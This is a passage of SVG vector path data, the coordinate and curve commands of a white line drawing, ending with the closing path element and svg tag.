70.461 36.515 C 71.266 35.618 71.303 35.526 70.933 35.526 C 70.294 35.526 68.675 36.339 68.119 36.94 C 67.842 37.236 67.564 37.412 67.509 37.329 Z M 70.007 33.676 C 70.359 33.907 70.498 33.926 70.702 33.759 C 70.924 33.584 70.896 33.436 70.526 32.742 C 70.294 32.298 70.091 31.67 70.091 31.355 C 70.091 31.004 69.98 30.736 69.813 30.671 C 69.566 30.578 69.332 30.643 69.11 30.865 C 68.527 31.448 69.036 33.029 70.007 33.667 Z M 109.398 33.861 C 109.657 33.473 109.648 33.371 109.287 32.539 C 108.898 31.642 108.232 30.93 107.769 30.93 C 107.64 30.93 107.316 31.133 107.094 31.364 C 106.862 31.596 106.659 31.928 106.659 32.076 C 106.659 32.456 107.14 33.399 107.603 33.889 C 108.102 34.434 109.037 34.416 109.407 33.852 Z M 254.291 40.732 C 254.013 40.584 253.661 40.473 253.541 40.491 C 253.411 40.51 243.49 40.574 231.504 40.63 C 219.518 40.685 209.597 40.796 209.467 40.88 C 209.115 41.092 209.217 41.462 209.661 41.573 C 210.05 41.675 221.268 41.795 242.768 41.934 C 248.626 41.971 253.467 42.054 253.522 42.109 C 253.578 42.165 253.421 44.135 253.152 46.502 C 252.458 52.781 251.144 69.231 249.607 90.906 C 249.459 92.987 249.246 95.438 249.145 96.335 L 248.95 97.971 L 246.803 97.971 C 245.618 97.971 242.361 98.045 239.538 98.138 C 236.715 98.23 231.485 98.387 227.885 98.489 C 224.285 98.591 219.926 98.748 218.176 98.841 C 216.427 98.933 214.048 99.053 212.882 99.118 L 210.763 99.22 L 212.706 98.128 C 215.446 96.593 222.128 92.793 223.915 91.757 C 225.395 90.897 226.21 90.324 226.21 90.13 C 226.21 89.741 221.74 90.712 217.325 92.044 C 210.281 94.18 201.498 98.313 198.324 100.977 L 197.093 102.012 L 196.658 101.328 C 195.815 100.006 193.751 95.733 193.27 94.337 C 193.002 93.56 192.743 92.358 192.696 91.674 C 192.557 89.677 192.909 88.78 195.214 85.34 C 197.148 82.445 201.045 77.378 201.387 77.322 C 201.526 77.295 203.257 81.669 203.257 82.048 C 203.257 82.112 202.868 82.39 202.396 82.658 C 200.823 83.537 200.758 84.054 202.239 83.832 C 202.942 83.721 205.645 82.455 213.067 78.737 C 222.971 73.781 225.34 72.422 225.34 71.691 C 225.34 70.776 224.266 71.155 218.13 74.215 C 216.066 75.251 213.678 76.481 212.836 76.953 C 211.984 77.424 209.874 78.608 208.134 79.579 C 206.385 80.559 204.95 81.336 204.941 81.317 C 204.923 81.299 205.015 80.402 205.145 79.311 C 205.358 77.489 207.496 54.112 208.134 46.613 C 208.421 43.228 208.43 41.518 208.144 41.453 C 208.051 41.434 207.903 41.693 207.838 42.026 C 207.653 42.868 206.69 50.903 205.293 63.202 L 204.117 73.522 L 203.266 74.317 C 202.803 74.743 202.165 75.297 201.868 75.519 C 201.276 75.972 198.064 79.57 196.26 81.807 C 192.872 86.024 190.568 90.333 189.836 93.801 L 189.624 94.809 L 188.902 94.106 C 187.948 93.191 187.467 92.941 187.051 93.163 C 186.162 93.634 168.253 114.829 167.411 116.401 C 167.133 116.909 167.244 117.085 167.744 116.919 C 168.271 116.752 179.683 104.028 185.329 97.324 C 186.393 96.057 187.31 94.966 187.384 94.883 C 187.458 94.8 187.772 95.031 188.096 95.401 C 188.42 95.77 190.438 98.018 192.557 100.385 L 196.426 104.703 L 196.112 105.6 C 195.519 107.274 193.27 111.971 191.799 114.616 C 187.375 122.559 182.525 129.06 176.592 134.997 C 175.185 136.412 173.399 138.067 172.621 138.686 C 169.41 141.266 165.569 143.449 163.07 144.133 C 162.311 144.346 161.848 144.558 161.848 144.715 C 161.848 145.353 165.236 144.466 167.901 143.125 C 171.27 141.442 176.064 137.817 179.591 134.294 C 187.023 126.878 193.594 116.965 196.963 108.088 C 197.407 106.922 197.879 105.693 198.027 105.35 C 198.287 104.731 198.194 104.102 197.805 103.862 C 197.703 103.797 197.611 103.677 197.611 103.603 C 197.611 103.381 200.045 101.439 201.23 100.718 C 202.498 99.941 199.555 100.024 225.155 100.061 C 246.183 100.089 249.857 100.015 250.44 99.534 C 250.801 99.238 250.838 99.016 250.949 96.51 C 251.014 95.021 251.283 91.387 251.533 88.419 C 253.708 62.925 254.818 47.621 254.818 43.043 L 254.818 40.981 L 254.3 40.704 Z M 117.247 49.063 C 117.247 48.601 116.849 48.037 116.525 48.037 C 116.442 48.037 116.284 48.259 116.182 48.518 C 116.081 48.786 115.905 49.063 115.784 49.137 C 115.359 49.405 114.035 49.267 113.434 48.897 C 112.601 48.388 111.879 48.499 111.805 49.137 C 111.694 50.127 112.795 50.848 114.424 50.848 C 116.192 50.848 117.247 50.173 117.247 49.045 Z M 102.41 49.1 C 102.346 49.1 101.457 49.526 100.448 50.034 C 97.977 51.292 95.126 53.021 92.785 54.658 C 90.786 56.054 88.99 57.506 88.99 57.709 C 88.99 57.774 89.314 58.107 89.703 58.421 L 90.415 59.013 L 91.952 57.876 C 94.516 55.971 96.7 54.63 99.726 53.114 L 102.605 51.662 L 102.568 50.386 C 102.549 49.683 102.475 49.11 102.41 49.11 Z M 102.503 54.972 L 102.559 53.798 C 102.586 53.141 102.549 52.623 102.466 52.633 C 102.392 52.633 101.244 53.188 99.921 53.844 C 97.163 55.231 94.84 56.655 92.553 58.347 C 90.86 59.605 90.813 59.716 91.6 60.447 C 91.952 60.77 91.97 60.761 92.887 60.086 C 94.497 58.902 96.894 57.561 99.754 56.239 L 102.494 54.972 Z M 99.921 57.016 C 97.329 58.236 94.71 59.697 93.211 60.77 L 92.378 61.362 L 92.813 62.092 L 93.248 62.823 L 94.877 61.834 C 95.765 61.288 97.894 60.225 99.588 59.466 L 102.679 58.088 L 102.734 56.942 C 102.762 56.304 102.725 55.795 102.642 55.795 C 102.568 55.795 101.337 56.341 99.921 57.007 Z M 93.775 63.461 C 93.636 63.637 93.72 64.062 94.136 65.172 C 94.432 65.986 94.71 66.679 94.747 66.716 C 94.784 66.753 95.589 66.3 96.543 65.717 C 98.56 64.487 100.467 63.507 101.985 62.943 C 103.012 62.555 103.049 62.527 103.095 61.871 C 103.123 61.501 103.086 60.659 103.003 60.03 L 102.864 58.865 L 100.041 60.123 C 97.237 61.371 94.164 63.017 93.784 63.47 Z M 222.674 75.538 C 221.03 76.51 219.398 77.502 217.778 78.515 C 215.427 80.004 209.125 84.35 208.051 85.22 C 207.292 85.83 207.042 86.44 207.607 86.292 C 207.783 86.246 209.828 84.951 212.16 83.407 C 214.493 81.863 218.213 79.449 220.425 78.044 C 224.859 75.223 225.738 74.567 225.645 74.123 C 225.59 73.883 224.979 74.178 222.665 75.547 Z M 228.024 76.463 C 227.95 76.463 224.155 78.7 219.583 81.447 C 209.782 87.328 208.727 88.003 208.727 88.336 C 208.727 88.844 209.56 88.687 211.114 87.883 C 212.475 87.18 217.899 84.961 223.831 82.667 C 224.711 82.325 225.599 81.983 225.83 81.9 C 226.062 81.807 226.191 81.669 226.136 81.585 C 226.08 81.493 224.877 81.817 223.443 82.288 C 222.008 82.76 220.833 83.139 220.814 83.12 C 220.768 83.065 226.034 78.599 227.237 77.683 C 228.033 77.073 228.44 76.444 228.033 76.463 Z M 226.173 84.48 C 226.876 84.017 227.441 83.537 227.441 83.407 C 227.441 83.102 227.515 83.083 226.469 83.629 C 225.21 84.286 216.436 87.984 213.928 88.928 C 211.318 89.899 210.754 90.342 211.42 90.897 C 211.688 91.119 212.642 90.999 216.399 90.278 C 219.592 89.667 225.581 88.345 225.812 88.206 C 226.136 88.012 226.08 87.568 225.719 87.568 C 225.544 87.568 224.461 87.725 223.295 87.91 C 222.128 88.105 221.157 88.234 221.129 88.206 C 221.055 88.132 224.692 85.441 226.164 84.48 Z M 17.557 167.842 C 17.891 167.842 22.148 163.237 29.932 154.434 C 34.467 149.311 36.124 147.323 42.186 139.787 C 48.1 132.426 50.895 129.051 56.393 122.587 C 61.965 116.04 65.759 111.472 71.59 104.324 C 74.394 100.884 77.902 96.63 79.365 94.883 C 83.335 90.157 84.446 88.622 83.881 88.622 C 83.789 88.622 82.863 89.556 81.799 90.703 C 78.717 94.041 75.505 97.759 69.026 105.471 C 65.685 109.447 59.725 116.484 55.782 121.089 C 47.961 130.225 45.222 133.508 40.159 139.796 C 35.809 145.196 33.828 147.554 25.23 157.597 C 21.297 162.183 17.863 166.28 17.594 166.696 C 17.104 167.454 17.095 167.842 17.557 167.842 Z M 160.377 143.966 C 161.672 145.335 159.96 144.641 157.545 142.829 C 155.971 141.645 155.268 140.832 147.919 131.64 L 142.051 124.298 L 141.829 125.916 C 141.709 126.804 141.135 131.538 140.552 136.439 C 139.645 144.133 136.331 171.282 136.044 173.437 C 135.85 174.87 134.767 175.277 131.102 175.314 L 128.612 175.342 L 128.131 179.577 C 127.391 186.068 124.67 208.631 124.568 209.075 C 124.494 209.417 124.364 209.482 123.763 209.482 L 123.05 209.482 L 123.152 208.733 C 123.207 208.317 123.846 203.305 124.568 197.572 L 125.873 187.16 L 125.364 186.096 C 123.17 181.547 114.396 174.167 103.29 167.537 C 100.448 165.845 99.726 165.475 95.765 163.709 L 92.729 162.359 L 90.804 162.359 C 87.805 162.359 74.607 161.601 73.395 161.36 C 73.127 161.305 72.923 161.342 72.923 161.443 C 72.923 161.73 67.518 173.973 59.558 191.737 C 55.384 201.049 51.858 208.974 51.728 209.334 L 51.487 210 L 49.424 210 L 49.942 209.075 C 50.229 208.567 51.46 205.922 52.672 203.213 C 53.885 200.503 56.208 195.288 57.827 191.654 C 59.447 188.02 61.807 182.758 63.057 179.975 C 64.306 177.191 65.333 174.842 65.333 174.759 C 65.333 174.676 64.713 174.426 63.973 174.214 C 60.817 173.289 58.947 171.809 57.652 169.193 C 56.624 167.13 56.356 165.706 56.633 163.811 C 57.068 160.815 58.077 158.882 60.734 155.923 C 63.695 152.64 66.398 148.581 69.924 142.163 C 76.875 129.495 81.854 115.273 83.604 103.085 C 84.261 98.489 84.14 98.693 82.15 105.554 C 80.373 111.675 77.819 120.285 77.328 121.838 C 77.153 122.402 76.829 122.744 76.829 122.365 C 76.829 121.746 83.733 96.834 84.094 96.15 C 84.946 94.522 85.177 100.052 84.492 105.341 C 83.872 110.094 81.836 118.787 80.087 124.094 C 76.708 134.377 70.1 147.323 65.019 153.611 C 64.232 154.582 63.612 155.396 63.64 155.424 C 63.668 155.451 64.158 155.322 64.741 155.137 C 67.24 154.36 71.72 154.249 75.533 154.869 C 80.003 155.599 86.426 157.597 91.887 159.973 C 100.633 163.774 102.466 164.578 107.131 166.65 C 115.257 170.274 122.615 172.586 127.77 173.141 C 129.658 173.344 133.573 173.233 134.008 172.965 C 134.203 172.845 134.758 168.823 137.22 149.922 C 137.905 144.678 138.775 138.15 139.154 135.404 C 139.774 130.956 139.83 130.336 139.617 129.754 C 139.487 129.393 138.062 126.434 136.461 123.188 C 131.565 113.257 128.742 107.329 128.742 106.959 C 128.742 106.266 129.408 106.627 130.63 107.986 C 132.583 110.168 144.541 124.39 153.481 135.191 C 155.86 138.067 158.405 141.294 159.192 142.422 C 159.562 142.949 160.108 143.652 160.404 143.957 Z M 89.333 160.889 C 89.092 160.648 84.77 159.113 81.577 158.133 C 79.689 157.56 77.449 156.931 76.625 156.755 L 75.116 156.431 L 74.302 158.346 L 73.487 160.26 L 75.116 160.26 C 76.93 160.26 86.537 160.722 88.287 160.889 C 88.925 160.953 89.388 160.953 89.333 160.889 Z M 65.074 146.704 C 64.88 146.398 64.778 146.445 63.742 147.332 C 60.456 150.143 46.684 162.581 38.345 170.265 L 34.05 174.223 L 30.922 172.642 C 25.748 170.016 22.037 168.721 19.705 168.721 C 18.048 168.721 17.622 169.313 18.326 170.644 L 18.65 171.245 L 17.585 172.318 C 15.91 174.01 13.753 177.598 14.161 178.005 C 14.346 178.19 14.586 177.894 15.382 176.535 C 17.289 173.289 20.278 170.635 22.296 170.395 C 23.046 170.302 23.342 170.367 24.24 170.82 C 26.859 172.124 30.154 175.906 31.626 179.29 C 32.116 180.419 32.199 180.825 32.172 181.87 C 32.135 183.507 31.228 187.89 30.219 191.312 C 29.284 194.483 29.136 195.269 29.488 195.158 C 30.034 194.983 31.829 189.462 32.819 184.913 C 33.458 181.981 33.773 179.3 33.662 177.626 C 33.588 176.498 33.625 176.322 33.884 176.322 C 34.282 176.322 35.069 175.638 40.242 170.774 C 56.93 155.072 65.241 147.009 65.065 146.713 Z M 90.008 174.001 C 89.092 175.092 86.325 181.214 84.936 185.227 C 83.927 188.158 83.511 190.331 83.511 192.782 L 83.511 194.807 L 82.299 196.989 C 81.632 198.182 79.938 201.197 78.532 203.666 C 76.391 207.432 75.391 209.387 75.533 209.528 C 75.625 209.621 76.69 209.732 77.893 209.769 L 80.077 209.834 L 81.021 207.069 C 81.54 205.543 82.808 202.362 83.835 199.976 L 85.705 195.658 L 85.751 193.633 C 85.779 192.523 85.964 190.729 86.167 189.666 C 86.602 187.409 88.24 182.379 90.018 177.811 C 91.323 174.473 91.415 174.084 91.063 173.733 C 90.739 173.409 90.462 173.483 89.999 174.029 Z M 76.875 175.037 L 76.986 174.547 L 75.792 174.574 C 75.126 174.593 74.052 174.667 73.367 174.75 C 72.682 174.833 71.424 174.935 70.544 174.981 C 68.989 175.055 68.943 175.074 68.554 175.638 C 68.332 175.952 68.156 176.396 68.156 176.618 L 68.156 177.025 L 71.22 177.025 C 72.895 177.025 74.783 176.969 75.376 176.914 C 76.56 176.794 76.468 176.905 76.875 175.046 Z M 105.853 175.092 C 105.169 175.166 103.456 175.231 102.031 175.24 L 99.439 175.259 L 99.143 175.887 C 98.977 176.239 98.838 176.71 98.819 176.969 L 98.782 177.432 L 103.197 177.404 C 108.621 177.376 108.852 177.339 109 176.636 C 109.37 174.861 109.148 174.759 105.844 175.101 Z M 29.654 184.589 C 29.552 184.395 29.404 184.247 29.33 184.247 C 29.016 184.247 27.794 183.119 27.072 182.166 C 26.045 180.798 25.249 178.245 25.249 176.294 C 25.249 175.342 24.989 175.296 24.48 176.174 C 24.008 176.988 23.657 178.541 23.657 179.845 C 23.657 181.87 24.814 184.728 26.091 185.856 L 26.674 186.374 L 25.933 187.465 C 23.944 190.396 20.14 195.51 18.418 197.572 C 17.363 198.839 15.373 201.03 13.985 202.454 C 11.727 204.785 11.116 205.598 11.643 205.598 C 11.93 205.598 17.28 200.198 19.408 197.766 C 22.861 193.818 25.832 189.925 27.664 186.965 C 28.331 185.893 28.405 185.819 28.294 186.364 C 28.081 187.456 28.136 194.53 28.358 194.604 C 28.627 194.696 28.719 194.234 28.941 191.663 C 29.043 190.461 29.293 188.436 29.478 187.197 C 29.728 185.551 29.774 184.848 29.636 184.589 Z M 9.774 180.548 C 12.439 179.485 13.069 179.179 13.355 178.8 C 13.855 178.144 13.355 178.088 11.717 178.606 C 10.236 179.078 4.6 181.898 2.98 182.989 C 1.546 183.951 0 185.477 0 185.921 C 0 186.3 0.231 186.253 0.639 185.8 C 1.925 184.349 5.72 182.166 9.783 180.548 Z M 16.437 196.777 C 14.327 199.357 8.756 204.979 8.487 204.812 C 8.376 204.738 8.302 204.572 8.33 204.452 C 8.358 204.322 9.431 203.037 10.708 201.594 C 13.189 198.792 14.772 196.915 16.16 195.14 L 17.011 194.049 L 15.373 195.602 C 13.448 197.424 9.552 200.771 8.024 201.927 C 6.914 202.769 5.026 204.017 4.859 204.017 C 4.581 204.017 4.804 203.49 5.127 203.388 C 5.322 203.324 5.729 203.028 6.044 202.713 C 6.358 202.399 7.312 201.567 8.2 200.827 C 11.912 197.748 18.085 191.367 20.639 187.964 C 21.26 187.132 21.954 186.263 22.185 186.004 L 22.611 185.541 L 21.583 184.691 C 18.955 182.508 15.901 179.179 16.16 178.763 C 16.243 178.634 16.623 178.939 17.178 179.595 C 18.39 181.02 19.677 182.24 22.009 184.191 C 23.101 185.107 24.036 185.93 24.11 186.031 C 24.295 186.327 24.027 186.466 23.675 186.244 C 23.398 186.068 23.314 186.152 22.944 186.965 C 21.88 189.305 18.992 193.67 16.437 196.777 Z M 17.252 193.707 C 17.465 193.531 17.65 193.346 17.65 193.318 C 17.65 193.17 17.502 193.281 17.187 193.651 L 16.854 194.039 Z M 12.208 184.173 C 14.559 182.767 15.632 181.917 15.447 181.621 C 15.234 181.278 14.568 181.463 11.902 182.61 C 9.727 183.544 5.618 185.135 1.435 186.66 C 0.713 186.928 0.407 187.437 0.972 187.437 C 1.324 187.437 5.562 186.059 8.052 185.135 C 9.079 184.755 9.968 184.441 10.014 184.441 C 10.061 184.441 8.922 185.245 7.469 186.226 C 3.286 189.065 1.703 190.387 1.129 191.497 C 0.62 192.486 1.027 192.366 2.24 191.164 C 3.526 189.897 8.561 186.364 12.199 184.182 Z M 6.553 200.115 C 8.395 198.016 12.365 193.096 13.809 191.136 C 16.734 187.15 19.103 183.618 19.131 183.211 C 19.177 182.555 18.705 182.555 18.094 183.211 C 15.993 185.43 10.949 188.63 4.804 191.626 C 3.128 192.449 1.721 193.189 1.657 193.281 C 1.416 193.679 1.87 193.623 3.313 193.078 C 6.266 191.968 11.541 189.222 14.531 187.243 C 15.077 186.882 15.54 186.623 15.54 186.679 C 15.54 186.984 9.589 195.029 6.432 198.977 C 4.452 201.465 3.943 202.195 4.109 202.362 C 4.285 202.538 4.961 201.918 6.553 200.106 Z" fill="rgb(255, 255, 255)" height="209.99999944452435px" id="s16LUEeu4" width="425.00001613409887px"/></svg>)
